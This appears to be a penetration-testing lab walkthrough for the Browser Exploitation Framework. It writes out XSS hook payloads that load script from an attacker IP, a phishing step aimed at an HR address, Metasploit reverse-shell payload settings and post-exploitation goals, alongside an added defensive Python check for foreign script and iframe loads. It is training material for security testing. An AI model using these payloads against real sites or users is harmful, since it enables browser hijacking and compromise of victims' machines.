A Taste of the Browser Exploitation Framework (BeEF)
What is BeEF?
BeEF (Browser Exploitation Framework) is a powerful tool that allows penetration testers to assess the security of browser clients. It uses XSS (Cross-Site Scripting) vulnerabilities to hook the target's browser and control it remotely.
Using BeEF to Exploit an XSS Vuln
This walkthrough will use BeEF to exploit the XSS vulnerability outlined here.
- ATTACK_IP: 10.1.1.5
- pfSense: 10.1.1.40
- TARGET_IP (web server): 172.16.5.5
Configure and Start BeEF
1. View BeEF Configuration
$ less /opt/beef/config.yaml
Why?
Viewing the configuration file helps understand how BeEF is set up and configured, ensuring that it operates correctly within your network.
2. Modify the value for permitted_hooking_subnet
- Value: 10.1.1.40/32
Why?
This setting restricts which IP addresses can be hooked by BeEF. It ensures only devices within the specified subnet are targeted, enhancing security by limiting exposure.
3. Modify the value for permitted_ui_subnet
- Value: 127.0.0.1/32
Why?
This restricts access to the BeEF UI to the local machine, preventing unauthorized remote access to the control panel.
4. Identify Listening Port
- Port: 80
Why?
Knowing the port BeEF listens on is crucial for configuring firewalls and accessing the service correctly.
5. Check Hook File Setting
- Hook file: /stats.js
Why?
This JavaScript file is used to hook the target browser. When loaded, it establishes a connection between the victim’s browser and the BeEF server.
6. Enable Metasploit Extension
- Value: true
Why?
Integrating BeEF with Metasploit allows for advanced exploitation techniques, leveraging Metasploit’s extensive library of payloads and exploits.
7. View Metasploit Extension Configuration
$ less /opt/beef/extensions/metasploit/config.yaml
8. Check Metasploit Configuration
- Host: 127.0.0.1
- Port: 55552
- User: msf
- Pass: abc123
- SSL: true
- Callback Host: 10.1.1.5
9. Create beef.rc File
$ nano beef.rc
- Contents: load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123 SSL=y
Why?
This resource file automates the configuration of the Metasploit RPC server, streamlining the setup process.
10. Start Metasploit
$ msfconsole -r beef.rc
Why?
This command starts Metasploit with the settings specified in the beef.rc file, preparing it for use with BeEF.
11. Start BeEF Docker Container
$ sudo docker start beef
Why?
This command starts the BeEF service, making it accessible for launching attacks and managing hooked browsers.
12. Access BeEF UI
- URL: http://127.0.0.1/ui/panel
- Login using the attack box's credentials.
Why?
The BeEF UI is the control center where you manage hooked browsers and launch exploits.
Deliver the XSS Hook
13. Create HTML File for XSS Payload
$ nano stats.html
<script src="http://10.1.1.5/stats.js"></script>
Why?
This file contains the malicious JavaScript that hooks the target browser. When the file is loaded, it connects back to the BeEF server.
14. Host HTML File using Python Webserver
$ python3 -m http.server 80
Why?
Hosting the file on a web server makes it accessible to the target browser. Python's simple HTTP server is a quick and easy way to serve the file.
15. Exploit XSS Vulnerability
- On www.targetwebdomain.com, use the following payload in an iframe: <iframe src="http://10.1.1.5/stats.html"></iframe>
Why?
This leverages an existing XSS vulnerability on the target website to load the malicious JavaScript and hook the browser.
16. Phishing for Access
- Find internal email: hr@targetwebdomain.com
- Mail server FQDN: mail.targetwebdomain.com
- Mail server IP: 172.16.5.6
- Send a phishing email with a link to the XSS payload.
Why?
Phishing is a common technique to trick users into loading malicious content. By sending a crafted email, you entice the user to visit the link, triggering the XSS exploit.
17. Check for Hooked Browser in BeEF UI
- Once the target clicks the link, their browser should appear under "Online Browsers".
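The hook above works only because the vulnerable page ends up loading an iframe and a script from a host that is not its own. As an added, defender-side example that is not part of the original walkthrough, the following check parses a served page and reports any script, iframe, frame, embed or object tag whose source host is outside the site's allowlist; the sample page, the allowlist host www.targetwebdomain.com and the function names are constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class SrcCollector(HTMLParser):
    """Collect src/data attributes from tags that can pull remote code or frames."""
    WATCHED = {"script", "iframe", "frame", "embed", "object"}

    def __init__(self):
        super().__init__()
        self.sources = []  # list of (tag, url)

    def handle_starttag(self, tag, attrs):
        if tag in self.WATCHED:
            for name, value in attrs:
                if name in ("src", "data") and value:
                    self.sources.append((tag, value))


def find_foreign_loads(html, allowed_hosts):
    """Return (tag, url) pairs whose host is not in allowed_hosts.

    Relative URLs resolve to the page's own origin and are not reported;
    a scheme-relative URL (//host/path) counts as remote.
    """
    parser = SrcCollector()
    parser.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    foreign = []
    for tag, url in parser.sources:
        host = urlparse(url.strip()).hostname
        if host is None:  # relative path: same origin, skip
            continue
        if host.lower() not in allowed:
            foreign.append((tag, url))
    return foreign


# Constructed sample: a page body carrying the injected iframe from step 15.
SAMPLE_PAGE = """<html><body>
<script src="/js/app.js"></script>
<iframe src="http://10.1.1.5/stats.html"></iframe>
<img src="/img/logo.png">
</body></html>"""

if __name__ == "__main__":
    for tag, url in find_foreign_loads(SAMPLE_PAGE, ["www.targetwebdomain.com"]):
        print(f"suspicious <{tag}> loading {url}")
```

The same function can be run over stored HTTP response bodies from a proxy or WAF log to spot injected hooks after the fact.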
Exploit the Target with Metasploit
18. Search for Exploit
$ searchsploit chrome 80
Why?
This identifies an appropriate exploit for the target's browser version.
19. Configure and Launch Exploit via BeEF
- Payload: windows/x64/meterpreter/reverse_http
- SRVHOST: 10.1.1.5
- SRVPORT: 8080
- LHOST: 10.1.1.5
- LPORT: 8081
- URIPATH: feeds
20. Obtain Meterpreter Session
- Check msfconsole for a new session.
21. Post-Exploitation
Now it's time to figure out what's on this box, what sort of privileges we have, and how we can escalate those privileges, establish persistence, and exploit the network further. The Windows Privilege Escalation post will take these next steps:
- Migrate to a Stable Process: Ensure persistence by migrating to a stable system process.
- Perform Situational Awareness Checks: Gather information about the target system’s environment.
- Execute Additional Payloads (e.g., Empire): Further exploit the system using more advanced payloads.